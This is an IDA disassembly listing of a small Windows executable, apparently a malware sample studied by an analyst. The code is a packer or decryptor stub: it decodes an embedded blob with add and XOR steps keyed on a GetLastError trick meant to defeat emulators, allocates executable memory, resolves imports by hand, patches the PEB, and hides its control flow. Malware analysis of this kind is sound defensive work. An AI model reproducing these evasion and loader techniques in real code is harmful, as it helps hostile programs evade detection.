;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 8ACD7E19370C4AA07E8FD70FA8644848
; File Name : u:\work\8acd7e19370c4aa07e8fd70fa8644848_orig.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 000003E8 ( 1000.)
; Section size in file : 00000400 ( 1024.)
; Offset to raw data for section: 00000200
; Flags 60000020: Text Executable Readable
; Alignment : default
;
; Imports from KERNEL32.dll
;
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Externs
; _idata
; FARPROC __stdcall GetProcAddress(HMODULE hModule, LPCSTR lpProcName)
extrn GetProcAddress:dword ; CODE XREF: sub_40114D+52�p
; DATA XREF: sub_40114D+52�r
; BOOL __stdcall GetProcessTimes(HANDLE hProcess, LPFILETIME lpCreationTime, LPFILETIME lpExitTime, LPFILETIME lpKernelTime, LPFILETIME lpUserTime)
extrn GetProcessTimes:dword ; CODE XREF: sub_4010D0+31�p
; DATA XREF: sub_4010D0+31�r
; LPVOID __stdcall HeapAlloc(HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes)
extrn HeapAlloc:dword ; CODE XREF: sub_401051+42�p
; DATA XREF: sub_401051+42�r
; HANDLE __stdcall HeapCreate(DWORD flOptions, SIZE_T dwInitialSize, SIZE_T dwMaximumSize)
extrn HeapCreate:dword ; CODE XREF: sub_401051+33�p
; DATA XREF: sub_401051+33�r
; HMODULE __stdcall LoadLibraryA(LPCSTR lpLibFileName)
extrn LoadLibraryA:dword ; CODE XREF: sub_40114D+29�p
; DATA XREF: sub_40114D+29�r
; LPVOID __stdcall VirtualAlloc(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect)
extrn VirtualAlloc:dword
; DWORD __stdcall GetLastError()
extrn GetLastError:dword ; CODE XREF: sub_4010D0+3A�p
; DATA XREF: sub_4010D0+3A�r
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 40101Ch
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
align 10h
retn
; =============== S U B R O U T I N E =======================================
public start
start proc near
call sub_401051
call sub_4011E1
push eax
call sub_4011D6
retn
start endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401032 proc near ; CODE XREF: sub_401051+65�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
mov eax, [ebp+arg_4]
mov edx, [ebp+arg_0]
mov ecx, [ebp+arg_8]
test ecx, ecx
jz short loc_40104C
loc_401043: ; CODE XREF: sub_401032+18�j
mov bl, [eax]
mov [edx], bl
inc eax
inc edx
loc_401049: ; DATA XREF: sub_4011E1+A2�o
dec ecx
jnz short loc_401043
loc_40104C: ; CODE XREF: sub_401032+F�j
pop ebx
leave
retn 0Ch
sub_401032 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401051 proc near ; CODE XREF: start�p
; DATA XREF: sub_401051+5�o
push ebp
mov ebp, esp
push esi
push ebx
lea eax, sub_401051
and eax, 0FFFF0000h
add eax, 7000h
lea esi, [eax+88h]
mov ecx, [eax+74h]
mov dwBytes, ecx
shl ecx, 3
mov dword_402004, ecx
push 0 ; dwMaximumSize
push 0 ; dwInitialSize
push 1 ; flOptions
call ds:HeapCreate ; HeapCreate
push dwBytes ; dwBytes
push 8 ; dwFlags
push eax ; hHeap
call ds:HeapAlloc
mov dword_402008, eax
add eax, dwBytes
mov dword_40200C, eax
push dwBytes
push esi
push dword_402008
call sub_401032
push dwBytes
push dword_402008
call sub_4010D0
pop ebx
pop esi
leave
retn
sub_401051 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4010D0 proc near ; CODE XREF: sub_401051+76�p
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
lea eax, [ebp+var_C]
mov dword ptr [eax], 5854B02Fh
mov dword ptr [eax+4], 53CCBC34h
mov dword ptr [eax+8], 0
mov ecx, [ebp+arg_0]
mov edx, [ebp+arg_4]
loc_4010F3: ; CODE XREF: sub_4010D0+28�j
add byte ptr [ecx], 39h
inc ecx
dec edx
jnz short loc_4010F3
add dword_402008, 4
call ds:GetProcessTimes ; GetProcessTimes
add esp, 1Ch
call ds:GetLastError
xor eax, 6
not eax
lea esi, [ebp+var_C]
mov edi, [esi]
and edi, eax
mov [esi], edi
mov ecx, dword_402008
mov edx, [ebp+arg_4]
mov edi, esi
loc_401129: ; CODE XREF: sub_4010D0+67�j
mov al, [ecx]
xor al, [esi]
mov [ecx], al
inc esi
cmp byte ptr [esi], 0
jz short loc_401149
loc_401135: ; CODE XREF: sub_4010D0+7B�j
inc ecx
dec edx
jnz short loc_401129
push dword_402008
pop dword_402100
leave
retn 8
; ---------------------------------------------------------------------------
loc_401149: ; CODE XREF: sub_4010D0+63�j
mov esi, edi
jmp short loc_401135
sub_4010D0 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40114D proc near ; CODE XREF: sub_4011D6�p
hModule = dword ptr -4
push ebp
mov ebp, esp
sub esp, 4
pusha
mov esi, dword_402120
mov eax, esi
add eax, 3Ch
mov eax, [eax]
add eax, esi
add eax, 80h
mov ebx, [eax]
add ebx, esi
loc_40116C: ; CODE XREF: sub_40114D+6C�j
mov eax, [ebx+0Ch]
add eax, dword_402120
push eax ; lpLibFileName
call ds:LoadLibraryA ; LoadLibraryA
mov [ebp+hModule], eax
mov esi, [ebx]
add esi, dword_402120
mov edi, [ebx+10h]
add edi, dword_402120
loc_401190: ; CODE XREF: sub_40114D+63�j
mov ecx, [esi]
add ecx, dword_402120
add ecx, 2
push ecx ; lpProcName
push [ebp+hModule] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov [edi], eax
add edi, 4
add esi, 4
cmp dword ptr [esi], 0
jnz short loc_401190
add ebx, 14h
cmp dword ptr [ebx+0Ch], 0
jnz short loc_40116C
xor eax, eax
popa
leave
retn
sub_40114D endp
; =============== S U B R O U T I N E =======================================
sub_4011C0 proc near ; CODE XREF: sub_4011D6+5�p
push ebx
mov ecx, large fs:18h
mov ecx, [ecx+30h]
mov ebx, dword_402120
mov [ecx+8], ebx
pop ebx
retn
sub_4011C0 endp
; =============== S U B R O U T I N E =======================================
sub_4011D6 proc near ; CODE XREF: start+B�p
call sub_40114D
call sub_4011C0
retn
sub_4011D6 endp
; =============== S U B R O U T I N E =======================================
sub_4011E1 proc near ; CODE XREF: start+5�p
var_34 = dword ptr -34h
var_2C = dword ptr -2Ch
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_5 = dword ptr -5
mov eax, ebp
sub esp, 7
mov [esp+8+var_5], eax
add esp, 3
mov ebp, esp
mov [esp+4+var_1C], ebx
sub esp, 1Ch
mov eax, esi
mov [esp+20h+var_20], eax
mov eax, 4FE3Dh
lea ecx, ds:451F3Dh
push eax
sub ecx, eax
mov ebx, [ecx]
mov [esp+24h+var_24], edi
add ebx, [ebx+3Ch]
lea eax, [ebx+59F7h]
push dword ptr [eax-59C3h]
lea ecx, [ebx-3CF3h]
xor eax, eax
pop dword_402120
mov al, [ecx+3CF9h]
lea ecx, [ebp+5FE9h]
mov [ecx-5FEDh], eax
push 40h
mov ecx, 0Bh
mov eax, ecx
add eax, 3000h
push eax
sub [esp+2Ch+var_2C], ecx
push dword ptr [ebx+50h]
push eax
lea eax, [ebx+2733h]
mov ecx, [eax-26FFh]
mov [esp+34h+var_34], ecx
lea eax, ds:40AA50h
call dword ptr [eax-9A3Ch]
mov esi, eax
lea eax, [ebx+5E35h]
push dword ptr [eax-5DE1h]
push dword_402100
push esi
lea eax, loc_401049
push offset byte_401293
sub eax, 17h
push eax
retn
sub_4011E1 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
byte_401293 db 8Dh ; DATA XREF: sub_4011E1+A8�o
; ---------------------------------------------------------------------------
mov ebx, 144h
sub edi, 4Ch
loc_40129C: ; CODE XREF: .text:004012F6�j
mov eax, dword_402100
lea ecx, [edi+6FD7h]
add eax, [ecx-6FC3h]
mov edx, esi
push edx
inc edx
mov ecx, edx
add ecx, [edi+0Ch]
lea edx, [edi-4CFh]
dec ecx
mov edx, [edx+4DFh]
mov [esp], edx
inc esp
mov [esp-5], eax
sub esp, 9
mov [esp], ecx
mov ecx, 23F6h
lea eax, ds:3FEC3Ch
add eax, ecx
call eax
mov eax, 5
lea ecx, [ebp-4]
sub edi, 0FFFFFFDDh
add edi, eax
dec dword ptr [ebp-4]
mov eax, [ecx]
inc eax
cmp eax, 1
jnz short loc_40129C
mov eax, 1
add eax, esi
add eax, [ebx+28h]
pop edi
dec eax
xor ebx, ebx
xchg esi, [esp]
add esp, 8
add ebx, [esp-4]
mov ecx, ebp
sub ecx, esp
add ecx, 4
add esp, ecx
mov ebp, [esp-4]
inc dword ptr [esp]
pop ecx
; ---------------------------------------------------------------------------
db 0E2h, 0FFh, 0E1h
dd 134Ch, 2 dup(0)
dd 13DAh, 1000h, 5 dup(0)
dd 137Ch, 138Eh, 13A0h, 13ACh, 13BAh, 13CAh, 136Ch, 0
dd 65470105h, 73614C74h, 72724574h, 726Fh, 65470129h, 6F725074h
dd 64644163h, 73736572h, 12F0000h, 50746547h, 65636F72h
dd 69547373h, 73656Dh, 65480180h, 6C417061h, 636F6Ch, 65480182h
dd 72437061h, 65746165h, 1A90000h, 64616F4Ch, 7262694Ch
dd 41797261h, 2950000h, 74726956h, 416C6175h, 636F6C6Ch
dd 454B0000h, 4C454E52h, 642E3233h, 6C6Ch, 6 dup(0)
_text ends
; Section 2. (virtual address 00002000)
; Virtual size : 00004F74 ( 20340.)
; Section size in file : 00000000 ( 0.)
; Offset to raw data for section: 00000000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 402000h
; SIZE_T dwBytes
dwBytes dd ? ; DATA XREF: sub_401051+1E�w
; sub_401051+39�r ...
dword_402004 dd ? dword_402008 dd ? ; sub_401051+5F�r ...
dword_40200C dd ? dd 3Ch dup(?)
dword_402100 dd ? ; sub_4011E1+9B�r ...
dd 7 dup(?)
dword_402120 dd ? ; sub_40114D+22�r ...
dd 13B7h dup(?)
_data ends
end start